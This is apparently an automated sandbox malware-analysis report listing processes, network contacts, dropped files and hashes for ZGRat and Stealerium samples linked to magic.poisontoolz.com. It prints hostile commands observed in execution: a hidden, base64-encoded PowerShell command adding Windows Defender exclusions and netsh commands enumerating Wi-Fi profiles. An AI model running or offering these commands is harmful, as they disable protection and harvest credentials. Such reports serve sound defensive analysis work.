"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4E8D65E53F52C2E793C436F7B299ADBD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4E8D65E53F52C2E793C436F7B299ADBD --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --renderer-client-id=4 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=52B0186A564DE3CD6194553D4ACAB064 --mojo-platform-channel-handle=2548 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=73AC7C45C0CF6A5E20EAE9DA9193AB63 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3261FE8E9A19406519F4ABADEEF0918A --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.166.126.56:443 tcp
GB 23.37.0.169:443 tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
GB 104.77.160.14:80 tcp
US 8.8.8.8:53 udp
N/A 93.184.221.240:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
GB 96.17.179.41:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
FR 194.33.191.53:58001 tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 53.191.33.194.in-addr.arpa udp
FR 194.33.191.53:58001 tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0naqnljo.j0i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

MD5 d9c253eaa73b4a33b91def3e863d644e
SHA1 626c26f275e691183fa48b68daf586e24960cc3e
SHA256 45474eaa30615f25da4e0f31447222de844cfea4375eaff3a6d9adf19101e654
SHA512 5041ca9cce11cc44a11525eac5944a5fd21652b53794f4c2eb656f33d7d2e8cf2bd7ee25304a829578e57869b77d36c624059108ab8f018ef85ab673efc391c7

C:\Users\Admin\AppData\Roaming\RIB.pdf

MD5 ac6f4727f46bff3bd3f71550ae96c15f
SHA1 5966b42c1989bf6886c887a29480bd8a249476ee
SHA256 580b5d3ab9575c944f5f15f42fe82a5024411a68f759ee7137e0403ac2b568e0
SHA512 734a98dd5dad4674bd56b6138a94580be819c77ec3945901053b6c9f9a8bd34f4975f3a71b363ca257bfe0187cebe52bbb65fc262cb59f923396f5c2cebe737a

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

MD5 220f7a6283256dfda65a5879cb7d8afc
SHA1 b640bc6f963b8cdc8104fb8f99ca7b3a34a510b0
SHA256 bac0966abfbc560de0f8802564fc5bc95e8492f838b394404641183a27c30b37
SHA512 e7e88895d26431f84c71b69c27b2549f7ecc5b2e473c3dc3c4f3bf52439d98d6e01e3640d142b8d0fe0a3e9da1b1efcd8b6a3233d86848ad53787e6c73014f89

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

MD5 0abd42634db4f4fb3bbbcaa066413d68
SHA1 074f62ae3b24d775f09e98e81e857e6f1be05f3b
SHA256 a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4
SHA512 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yagacrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 569124b0982577268dcbc9070e76fea0
SHA1 149910730a6bc3a691d8df4dafb3cc12fd625496
SHA256 b3f8175d4f6cb09f6d2f912e1bf6d31caeaa5aa16abb84831051c883f16e7ec1
SHA512 fb34ef6fc5f61a16112e1fb1223f07a9d309e7871638d8792435e56ca4a8201b953d51047d264505bdd420898602d96419380f0ad0b68ae474c0b4a583ffaf95

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

MD5 d9978a7bc703072527518ec65490fabb
SHA1 4cfc423812a29a857dd4d7db38bb648be228df30
SHA256 edfc6d7d35c07e5cd1f9fa65b8c4861adaa39ef7091fe14c51b87a1d4932e5e5
SHA512 c3f248557d1c35f1d7ec5a96fbf784e52110fecaefcb82001426b996b58e43154e57c37484b3be974efac8e7b494d69a755808910af3e10fd82edc15a0ee6222

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b80cd7a712469a4c45fec564313d9eb
SHA1 6125c01bc10d204ca36ad1110afe714678655f2d
SHA256 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512 ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

MD5 f3ed43acd7d035e8c6035c7d65ec60bf
SHA1 679c01b051cbd42b740a05f0cd2807b16bae5aec
SHA256 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef
SHA512 fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

Analysis: behavioral24

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe"

Signatures

Detect ZGRat V1

Stealerium

stealer stealerium

ZGRat

rat zgrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2600 set thread context of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
PID 3764 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe
PID 3764 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 4924 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 5020 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 5020 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5020 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4924 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 40.126.32.133:443 tcp
US 8.8.8.8:53 udp
SE 192.229.221.95:80 tcp
US 8.8.8.8:53 udp
US 138.91.171.81:80 tcp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 208.95.112.1:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 149.154.167.220:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 162.159.135.233:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.167.249.196:443 tcp
SE 192.229.221.95:80 tcp
N/A 40.126.32.133:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 152.199.19.74:80 tcp
N/A 52.140.118.28:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
N/A 52.140.118.28:443 tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
N/A 51.178.66.33:443 tcp
US 8.8.8.8:53 udp
N/A 136.175.8.205:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 13.95.31.18:443 tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
N/A 104.77.160.23:80 tcp
US 8.8.8.8:53 udp
N/A 104.18.115.97:80 tcp
N/A 162.159.135.233:443 tcp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 udp
GB 96.17.179.34:80 tcp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.111.229.48:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 192.98.74.40.in-addr.arpa udp

Files


memory/2600-37-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-25-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-13-0x0000000007200000-0x0000000007763000-memory.dmp

memory/2600-5-0x0000000007200000-0x0000000007763000-memory.dmp

